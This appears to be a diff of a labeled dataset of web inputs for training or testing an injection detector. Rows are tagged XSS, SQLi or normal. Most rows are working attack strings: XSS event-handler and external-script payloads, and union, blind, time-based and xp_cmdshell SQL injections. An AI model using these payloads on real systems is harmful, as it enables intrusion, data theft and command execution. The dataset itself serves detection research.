onanimationstart=""alert(1)""></rb>",1,XSS,8689 -Where did you find that calming garden?,0,normal,24094 -Create a lasting memory.,0,normal,22795 -"-5596' ) ) ) union all select 4877,4877,4877,4877,4877,4877,4877,4877,4877,4877--",2,SQLi,14622 -Select walk.,0,normal,24822 --8652' ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,16606 -") AND ELT(1337=1337,SLEEP(5)) AND (""1337""=""1337",2,SQLi,11340 --5580 or 4829 = 1968,2,SQLi,14901 -"1' where 9116 = 9116 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,22609 -"<div draggable=""true"" contenteditable>drag me</div><map ondragover=alert(1) contenteditable>drop here</map>",1,XSS,7439 -"<map draggable=""true"" ondrag=""alert(1)"">test</map>",1,XSS,7199 -Where's the psychiatrist's office?,0,normal,23844 -"<dir onpaste=""alert(1)"" contenteditable>test</dir>",1,XSS,6757 -"<datalist onmouseout=""alert(1)"">test</datalist>",1,XSS,5255 -"-5139 ) ) union all select 3373,3373,3373,3373,3373,3373,3373,3373#",2,SQLi,12262 -<dfn onblur=alert(1) tabindex=1 id=x></dfn><input autofocus>,1,XSS,1984 -AND 1=1--,2,SQLi,10252 -ORDER BY 11--,2,SQLi,10288 -Order a cheesy pizza.,0,normal,22852 -"<acronym onkeydown=""alert(1)"" contenteditable>test</acronym>",1,XSS,4808 -"1' ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 'qfwc' = 'qfwc",2,SQLi,22421 -select * from users where id = '1' or !<@ or 1 = 1 -- 1',2,SQLi,12020 -"select * from users where id = 1 or $+<$ union select 1,@@VERSION -- 1",2,SQLi,11901 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7--",2,SQLi,10813 -"<time draggable=""true"" ondragstart=""alert(1)"">test</time>",1,XSS,4661 -"-3834' ) ) ) union all select 8313,8313--",2,SQLi,15481 -"<style>:target {transform: rotate(180deg);}</style><basefont id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></basefont>",1,XSS,6134 -"-1707 ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( 7756 = 7756",2,SQLi,20604 -"<listing draggable=""true"" ondrag=""alert(1)"">test</listing>",1,XSS,3996 -ORDER BY 26,2,SQLi,10365 -"<style>:target {transform: rotate(180deg);}</style><body id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></body>",1,XSS,8693 -"1 ) where 6990 = 6990 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,13619 -"{""id"":null,""name"":""everything""}",0,normal,26079 -"1"" ) where 6823 = 6823 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,17765 -"<nextid onmouseleave=""alert(1)"">test</nextid>",1,XSS,3510 -Where's the perfect spot to have a picnic?,0,normal,24057 -"1' ) as kbja where 4275 = 4275 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,17319 -"-1525' ) ) ) union all select 4110,4110,4110,4110,4110,4110#",2,SQLi,22361 -1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,17443 -"<div draggable=""true"" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable>drop here</figcaption>",1,XSS,7049 -"<abbr oncopy=""alert(1)"" contenteditable>test</abbr>",1,XSS,7153 -"<object onkeyup=""alert(1)"" contenteditable>test</object>",1,XSS,8571 -"1"" ) where 6367 = 6367 union all select null,null,null,null,null,null,null#",2,SQLi,17285 -Select can.,0,normal,24705 -"<tt onmouseleave=""alert(1)"">test</tt>",1,XSS,3311 -admin' ) or ( '1' = '1,2,SQLi,11515 -"<style>@keyframes slidein {}</style><tfoot style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></tfoot>",1,XSS,2185 -"<data draggable=""true"" ondragenter=""alert(1)"">test</data>",1,XSS,1924 -"1%' ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( '%' = '",2,SQLi,17418 -1' ) ) ) and 7533 = 7533 and ( ( ( 'hoyw' = 'hoyw,2,SQLi,19982 -"{""id"":null,""firstName"":""Chin Huat"",""lastName"":""Lim"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25558 -lock,0,normal,23359 -"<frameset onclick=""alert(1)"">test</frameset>",1,XSS,3662 -\'; desc users; --,2,SQLi,11110 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21",2,SQLi,10468 -1 ) where 7956 = 7956 or sleep ( 5 ) #,2,SQLi,15792 -"select * from users where id = 1 or 1#""? = 1 or 1 = 1 -- 1",2,SQLi,11470 -"-3391' union all select 2024,2024--",2,SQLi,12415 -"<SCRIPT a="">"" '' SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,292 -"1'|| ( select 'xuof' from dual where 8794 = 8794 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15789 -Select the perfect angle for the shot.,0,normal,24382 -<td onblur=alert(1) tabindex=1 id=x></td><input autofocus>,1,XSS,2226 -"{""id"":null,""firstName"":""Fook Weng"",""lastName"":""Ow Yong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25695 -"<bdi oncut=""alert(1)"" contenteditable>test</bdi>",1,XSS,5666 -"<multicol onkeydown=""alert(1)"" contenteditable>test</multicol>",1,XSS,7764 -"<head onmousemove=""alert(1)"">test</head>",1,XSS,4473 -"1' where 8430 = 8430 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,19703 -select * from users where id = 1 + \+%$ or 1 = 1 -- 1,2,SQLi,12027 -"<noembed><img title=""</noembed><img src onerror=alert(1)>""></noembed>",1,XSS,110 -"""a"""" or 3 = 3--""",2,SQLi,12154 -top[‘al\145rt’](1),1,XSS,6903 -"<table onkeyup=""alert(1)"" contenteditable>test</table>",1,XSS,2026 --3450' where 4478 = 4478 or 9323 = 9323#,2,SQLi,14923 -"<plaintext onmouseup=""alert(1)"">test</plaintext>",1,XSS,3847 -"<style>@keyframes x{}</style><noframes style=""animation-name:x"" onanimationend=""alert(1)""></noframes>",1,XSS,4624 -<div id=x tabindex=1 onbeforedeactivate=alert(1)></div><input autofocus>,1,XSS,5864 -"{""id"":null,""firstName"":""Renee"",""lastName"":""Tan"",""address"":""721 Interstate 45 S"",""city"":""685"",""telephone"":""2437936156""}",0,normal,25566 -<h1><font color=blue>hellox worldss</h1>,1,XSS,908 -"1 ) where 5385 = 5385 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,17087 -"<div draggable=""true"" contenteditable>drag me</div><data ondrop=alert(1) contenteditable>drop here</data>",1,XSS,8350 -"{""id"":7493,""name"":""for jmeter test to work <DO NOT DELETE>""}",0,normal,25294 -"{""id"":null,""name"":""Empoleon""}",0,normal,25939 -"-8824%' ) ) or make_set ( 9354 = 9354,7185 ) and ( ( '%' = '",2,SQLi,18147 -<figcaption onpointerleave=alert(1)>XSS</figcaption>,1,XSS,1693 -"admin"" or 1=1#",2,SQLi,9999 -"<cite onmouseup=""alert(1)"">test</cite>",1,XSS,3567 --6984 order by 1#,2,SQLi,17759 -"<figure draggable=""true"" ondragstart=""alert(1)"">test</figure>",1,XSS,3353 -"><script+src=https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)""></script>",1,XSS,9845 -"-6158"" ) ) ) or 8571 = 8571--",2,SQLi,18264 -"1"" ) as nfpe where 2679 = 2679",2,SQLi,17660 -Select a fitness class to get active.,0,normal,24199 --3088' or 6872 = 6872 and 'miwk' = 'miwk,2,SQLi,12835 -"<style>@keyframes x{}</style><acronym style=""animation-name:x"" onanimationend=""alert(1)""></acronym>",1,XSS,8291 -"1' ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( 'bmbt' = 'bmbt",2,SQLi,21759 -Select continue.,0,normal,24769 -<div id=x tabindex=1 onfocusin=alert(1)></div>,1,XSS,4506 -"<svg><a xlink:href=""javascript:alert(1)""><text x=""20"" y=""20"">XSS</text></a>",1,XSS,150 -Select your replace.,0,normal,25230 -"1 ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 9313 = 9313",2,SQLi,17136 -Let's discuss where to go for our anniversary dinner.,0,normal,24100 -"1%' ) and elt ( 4249 = 4249,7259 ) and ( '%' = '",2,SQLi,12271 -"<rp onmouseout=""alert(1)"">test</rp>",1,XSS,5526 -"<IMG SRC=x ondragenter=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1163 -<center onpointerover=alert(1)>XSS</center>,1,XSS,7754 -"1' in boolean mode ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #",2,SQLi,13891 -<;SCRIPT>;a=/XSS/,1,XSS,1605 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i",2,SQLi,11132 -"<small onmouseenter=""alert(1)"">test</small>",1,XSS,6204 -<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>,1,XSS,1640 -1 WAITFOR DELAY '0:0:5'-- 1337,2,SQLi,11389 -Filter the posts.,0,normal,23034 -1' ) ) as bswc where 1635 = 1635 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,20158 -ORDER BY 16,2,SQLi,10355 -"1%' ) ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,19421 -Where did you discover that inspiring story from?,0,normal,23936 -"<;/TITLE>;<;SCRIPT>;alert(""XSS"");<;/SCRIPT>;",1,XSS,1587 -"1 ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,16930 -<iframe onpointerleave=alert(1)>XSS</iframe>,1,XSS,2168 -"<svg onkeydown=""alert(1)"" contenteditable>test</svg>",1,XSS,3198 -"1'+ ( select bptu where 7356 = 7356 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) +'",2,SQLi,19804 -"1'|| ( select 'ycya' from dual where 3536 = 3536 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,20138 -"<menu onbeforecopy=""alert(1)"" contenteditable>test</menu>",1,XSS,4037 -"<i oncopy=""alert(1)"" contenteditable>test</i>",1,XSS,7002 -"1%' ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ( '%' = '",2,SQLi,22548 -"<time onclick=""alert(1)"">test</time>",1,XSS,1768 -"1"" ) as nyzd where 5305 = 5305",2,SQLi,17738 -and SELECT pg_sleep(5);,2,SQLi,11399 -"-2305' in boolean mode ) union all select 8147,8147,8147,8147,8147,8147,8147,8147,8147,8147--",2,SQLi,18555 -"<style>@keyframes slidein {}</style><meta style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></meta>",1,XSS,6533 -"1"" ) ) union all select null,null,null,null,null,null--",2,SQLi,18017 -"<source onmousedown=""alert(1)"">test</source>",1,XSS,4822 -"<source draggable=""true"" ondrag=""alert(1)"">test</source>",1,XSS,3078 -<script onpointerdown=alert(1)>XSS</script>,1,XSS,5954 -"<style>@keyframes slidein {}</style><body style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></body>",1,XSS,7248 -Where's the yoga studio?,0,normal,23782 -Let's decide where to go for a relaxing weekend.,0,normal,23905 -"inurl:"".php?keyword=­""",1,XSS,9377 -1 where 6365 = 6365,2,SQLi,20091 -"1%"" ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""%"" = """,2,SQLi,19974 -"1"" ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ""eeye"" = ""eeye",2,SQLi,19615 -"1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11330 -<bdo onpointerup=alert(1)>XSS</bdo>,1,XSS,5450 -"1%' and make_set ( 1227 = 5627,5627 ) and '%' = '",2,SQLi,21957 -He picked a beautiful flower from the garden.,0,normal,24010 -"<tt onmouseenter=""alert(1)"">test</tt>",1,XSS,4291 -<script src=javascript:alert(1)>,1,XSS,9246 -", exec master..xp_cmdshell",2,SQLi,11718 -1' ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( 'brob' = 'brob,2,SQLi,15676 -"{""id"":null,""firstName"":""Violet"",""lastName"":""Goh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25928 -"`'><script>\xC2\xA0javascript:alert(537)</script> -`'><script>\xE1\x9A\x80javascript:alert(1)</script>",1,XSS,8942 -"<frameset onbeforecut=""alert(1)"" contenteditable>test</frameset>",1,XSS,7950 -"<fieldset onclick=""alert(1)"">test</fieldset>",1,XSS,4739 -"1"" ) where 2656 = 2656 or sleep ( 5 ) --",2,SQLi,13693 -"<image src=1 href=1 onerror=""javascript:alert(1)""></image>",1,XSS,347 -"<datalist draggable=""true"" ondrag=""alert(1)"">test</datalist>",1,XSS,8145 -<bdi id=x tabindex=1 onbeforedeactivate=alert(1)></bdi><input autofocus>,1,XSS,6647 -<strong id=x tabindex=1 onactivate=alert(1)></strong>,1,XSS,5108 -Select gin.,0,normal,24697 -Filter the noisy data.,0,normal,22762 -"-6971"" or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""ifuh"" like ""ifuh",2,SQLi,17236 -"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> -/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />",1,XSS,555 -"<embed type=""image"" src=%(scriptlet)s></embed>",1,XSS,745 -1%' ) union all select null#,2,SQLi,16563 -"{""id"":null,""name"":""gain""}",0,normal,25855 -1 ) as obzn where 7652 = 7652 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --,2,SQLi,21662 -"{""id"":null,""name"":""bowl sad""}",0,normal,25511 -"<slot onmousedown=""alert(1)"">test</slot>",1,XSS,8030 -1' ) and ( 1414 = 4775 ) *4775 and ( 'mlmw' = 'mlmw,2,SQLi,12748 -"1"" ) as vzdq where 3160 = 3160",2,SQLi,19779 -"1"" ) where 7914 = 7914 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,21621 -select ( case when ( 7163 = 1777 ) then 1 else 7163* ( select 7163 from master..sysdatabases ) end ) --,2,SQLi,19552 -"<a href=""\xE1\xA0\x8Ejavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,472 -"1%' ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( '%' = '",2,SQLi,20783 -"{""id"":null,""firstName"":""Angeline"",""lastName"":""Tan"",""address"":""39 Stamford Rd #01-07"",""city"":""402"",""telephone"":""103057869""}",0,normal,25581 -"-3868' ) ) or make_set ( 6809 = 1236,1236 ) and ( ( 'evnj' = 'evnj",2,SQLi,22223 -<embed id=x onfocusin=alert(1) type=text/html>,1,XSS,2365 -"{""id"":null,""firstName"":""Vincent"",""lastName"":""Yong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,26069 -"<h1 onkeypress=""alert(1)"" contenteditable>test</h1>",1,XSS,5876 -"javascript:`/*</title></style></textarea></noscript></script></noembed></template></select/""/'/*--><frame onload=alert()><svg/\""/*<svg onload=' /**/-alert()//'>javascript:/*`/*\""/*'/*</noembed>""/*<frame src=javascript:/**/;alert()//--></title></textarea></style></noscript></template></select></script><<svg/onload= alert()//>",1,XSS,9542 -"<address onmouseleave=""alert(1)"">test</address>",1,XSS,6718 -"1' ) ) ) and elt ( 9501 = 8427,8427 ) and ( ( ( 'ahpp' = 'ahpp",2,SQLi,14308 -"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) -- ygbf",2,SQLi,19371 --8292%' ) or 8571 = 8571--,2,SQLi,17856 -select * from users where id = 1 + ( \. ) or 1 = 1 -- 1,2,SQLi,11677 -"1"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( ""eslj"" like ""eslj",2,SQLi,19183 -);waitfor delay '0:0:__TIME__'--,2,SQLi,10884 -Let's choose a destination for our road trip.,0,normal,23867 -"ORDER BY 1,SLEEP(5),3--",2,SQLi,10508 -"-9256"" ) ) union all select 2977,2977,2977,2977,2977,2977,2977--",2,SQLi,20072 -"1"" ) ) as duny where 3756 = 3756 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,16453 -"<textarea draggable=""true"" ondragleave=""alert(1)"">test</textarea>",1,XSS,7137 -"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'atvu' = 'atvu",2,SQLi,13121 -1 ) ) as pjkd where 1105 = 1105 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,18995 -"<plaintext onmouseover=""alert(1)"">test</plaintext>",1,XSS,2865 -"{""id"":null,""name"":""grow""}",0,normal,25658 -I'm thinking of where to take a cooking class.,0,normal,24031 -"admin""or 1 = 1 or """" = """,2,SQLi,11811 -"1"" ) ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,17127 -1'+ ( select 'wyxu' where 2555 = 2555 union all select null#,2,SQLi,18533 -"-1218' union all select 2663,2663,2663,2663--",2,SQLi,15297 -"{""id"":null,""name"":""somebody maybe anywhere""}",0,normal,25535 -"<hr draggable=""true"" ondragleave=""alert(1)"">test</hr>",1,XSS,1792 -"1 where 6077 = 6077 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14868 -"1 ) as qjbd where 2808 = 2808 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,12753 -"1'+ ( select mems where 5091 = 5091 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) ) +'",2,SQLi,15617 -Select your observe.,0,normal,25162 -"1' or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and 'rhzy' = 'rhzy",2,SQLi,12354 -She'll select the dessert.,0,normal,24630 -"1' ) as idqc where 5288 = 5288 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,22541 -"<figure onbeforecopy=""alert(1)"" contenteditable>test</figure>",1,XSS,3434 -1 ) ) and 7533 = 7533 and ( ( 8738 = 8738,2,SQLi,15066 -"{""id"":null,""firstName"":""Nazierul Haqeem"",""lastName"":""Laili"",""address"":""6 Battery Road 31-00 Six Battery Road Building"",""city"":""469"",""telephone"":""5087170643""}",0,normal,25701 -1 ) where 6090 = 6090,2,SQLi,17619 -WHERE 1=1 AND 1=0--,2,SQLi,10277 -"{""id"":null,""name"":""Devimon""}",0,normal,25410 -<embed src=javascript:alert(1)>,1,XSS,9154 +<em id=x tabindex=1 onbeforeactivate=alert(1)></em>,1,XSS,6385 +"<th ondblclick=""alert(1)"">test</th>",1,XSS,3959 +1'+ ( select echl where 6593 = 6593 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,13216 +"1' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( 'iari' = 'iari",2,SQLi,18798 +Let's choose a destination for our next trip.,0,normal,23814 +"1' ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( 'mhvy' like 'mhvy",2,SQLi,20995 +convert,0,normal,23193 +"1 ) where 5550 = 5550 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,19674 +Voters first select their preferred candidate -- that's the state-wide vote.,0,normal,25148 +select ( case when ( 9455 = 6007 ) then 9455 else 9455* ( select 9455 from mysql.db ) end ) #,2,SQLi,12258 +"1%"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""%"" = """,2,SQLi,16605 +"-5548' where 4477 = 4477 union all select 4477,4477,4477,4477,4477,4477,4477,4477,4477,4477--",2,SQLi,15603 +<track id=x tabindex=1 ondeactivate=alert(1)></track><input id=y autofocus>,1,XSS,7938 +<style onload=alert(1)></style>,1,XSS,6283 +"1 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20888 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></select>",1,XSS,2567 +||'6,2,SQLi,11027 +"<event-source src=""%(event)s"" onload=""javascript:alert(1)"">",1,XSS,682 +"<li onmousemove=""alert(1)"">test</li>",1,XSS,7787 +<menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus>,1,XSS,8332 +"<style>@keyframes x{}</style><ol style=""animation-name:x"" onanimationstart=""alert(1)""></ol>",1,XSS,8834 +"</script><img/*%00/src=""worksinchrome&colon;prompt(1)""/%00*/onerror='eval(src)'>",1,XSS,314 +"<ins oncut=""alert(1)"" contenteditable>test</ins>",1,XSS,2361 +1' ) rlike sleep ( 5 ) and ( 'boto' = 'boto,2,SQLi,15610 +"<rb oncut=""alert(1)"" contenteditable>test</rb>",1,XSS,5659 +<picture id=x tabindex=1 onactivate=alert(1)></picture>,1,XSS,2202 +"select * from generate_series ( 1134,1134,case when ( 1134 = 4909 ) then 1 else 0 end ) limit 1--",2,SQLi,18006 +<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus>,1,XSS,3199 +Choose fields where applicable.,0,normal,23260 +"1"" ) ) ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( ( ( ""wjhj"" = ""wjhj",2,SQLi,12342 +"1 ) where 1185 = 1185 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,17625 +"<style>:target {color: red;}</style><div id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></div>",1,XSS,4086 +"<small onbeforepaste=""alert(1)"" contenteditable>test</small>",1,XSS,6133 +"><script+src=https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)""></script>",1,XSS,9771 +"<footer oncopy=""alert(1)"" contenteditable>test</footer>",1,XSS,8140 +<script>alert(1);</script>,1,XSS,1225 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--",2,SQLi,10877 +"select * from users where id = 1 union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,11549 +Retrieve data where necessary.,0,normal,23250 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))",2,SQLi,10616 +"<bgsound onkeypress=""alert(1)"" contenteditable>test</bgsound>",1,XSS,8642 +"1'+ ( select 'qaar' where 7841 = 7841 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ) +'",2,SQLi,18860 +"select * from users where id = 1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,11356 +<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>,1,XSS,1247 +"<tfoot onkeyup=""alert(1)"" contenteditable>test</tfoot>",1,XSS,8038 +<discard onpointerdown=alert(1)>XSS</discard>,1,XSS,3669 +ORDER BY 20,2,SQLi,10218 +"1"" order by 1#",2,SQLi,19071 +There a number of different animals that you can select when looking for a small furry friend.,0,normal,25302 +I want to select a recipe for tonight's dinner.,0,normal,23741 +"<noframes oncut=""alert(1)"" contenteditable>test</noframes>",1,XSS,5707 +"1"" ) ) as ecnn where 8913 = 8913 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,16388 +"<ul oncontextmenu=""alert(1)"">test</ul>",1,XSS,3471 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25",2,SQLi,10659 +;SELECT SLEEP(5); #,2,SQLi,11277 +"1 ) as rbmn where 5948 = 5948 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,17477 +-8828%' ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( '%' = ',2,SQLi,17575 +Modify the software settings.,0,normal,22561 +Select dinner.,0,normal,24468 +-4607'|| ( select 'wkdg' where 7524 = 7524 order by 1--,2,SQLi,12768 +Retrieve rows where required.,0,normal,23224 +"<style>@keyframes slidein {}</style><center style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" 